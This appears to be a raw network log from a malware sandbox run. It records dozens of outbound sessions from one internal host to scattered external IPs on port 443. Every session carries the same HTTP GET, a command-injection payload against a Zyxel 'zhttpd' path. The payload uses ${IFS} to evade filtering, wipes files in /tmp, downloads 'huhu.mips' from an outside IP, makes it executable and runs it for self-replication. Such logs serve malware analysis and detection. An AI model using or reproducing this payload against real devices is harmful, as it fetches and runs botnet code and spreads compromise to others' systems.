                                                      Feb 2, 2024 06:35:40.354770899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1270192.168.2.1434100222.13.45.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354794979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1271192.168.2.1435802107.241.82.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354850054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1272192.168.2.1438142123.177.28.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354876041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1273192.168.2.1438768135.102.66.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354933023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1274192.168.2.1440330119.84.12.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.354978085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1275192.168.2.144818057.64.212.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355000019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1276192.168.2.1436320144.147.36.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355051994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1277192.168.2.143542694.233.24.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355109930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1278192.168.2.145097283.190.238.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355178118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1279192.168.2.1444198216.164.185.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355210066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1280192.168.2.1440110145.77.242.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355247021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1281192.168.2.1460344115.177.224.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355282068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1282192.168.2.1440564223.244.55.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355330944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1283192.168.2.1455586182.189.247.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355360985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1284192.168.2.1444028131.5.63.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355390072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1285192.168.2.145447457.42.220.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355448008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1286192.168.2.143454859.148.232.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355506897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1287192.168.2.1439036167.131.74.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355525017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1288192.168.2.1439572120.31.78.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355611086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1289192.168.2.1433120156.241.192.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355611086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1290192.168.2.1452884207.19.48.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355627060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1291192.168.2.146077653.124.192.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355659008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1292192.168.2.1440190137.173.132.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355715990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1293192.168.2.1434914157.52.30.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355762959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1294192.168.2.1450074208.114.120.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355803013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1295192.168.2.145449483.107.187.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355839968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1296192.168.2.145230672.186.88.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355890989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1297192.168.2.1434648207.32.35.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.355925083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1298192.168.2.1454176177.60.245.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356003046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1299192.168.2.1432944107.184.210.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356003046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1300192.168.2.144444660.28.128.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356057882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1301192.168.2.1450582135.133.145.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356101036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1302192.168.2.1444286200.125.9.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356137037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1303192.168.2.144149890.127.107.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356168032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1304192.168.2.145056251.243.233.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356199026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1305192.168.2.145137266.19.81.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356261969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1306192.168.2.146078260.160.239.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356296062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1307192.168.2.1445632107.187.118.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356326103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1308192.168.2.143289880.241.35.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356375933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1309192.168.2.144323642.57.102.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356399059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1310192.168.2.144421457.67.54.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356471062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1311192.168.2.1450614179.189.190.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356512070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1312192.168.2.1436502175.194.252.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356539965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1313192.168.2.1444608132.226.36.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356589079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1314192.168.2.1450904162.123.110.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356631994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1315192.168.2.1442798178.216.244.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356686115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1316192.168.2.144617246.75.241.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356708050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1317192.168.2.144163273.53.247.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356755018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1318192.168.2.1455024161.80.250.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356782913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1319192.168.2.1440890145.67.231.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356827021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1320192.168.2.145096482.112.241.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356878042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1321192.168.2.144669646.197.216.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356905937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1322192.168.2.145736865.21.247.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356950998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1323192.168.2.1453304141.2.45.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.356987000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1324192.168.2.1446330184.147.251.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357028008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1325192.168.2.144665484.188.158.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357069969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1326192.168.2.143830858.63.248.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357099056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1327192.168.2.144697877.52.116.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357161045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1328192.168.2.145296096.169.9.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357161999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1329192.168.2.145192417.230.247.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357203007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1330192.168.2.1439010160.153.241.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357253075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1331192.168.2.143432424.226.101.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.357310057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1332192.168.2.143553646.158.163.237443
                                                      TimestampBytes transferredDirectionData
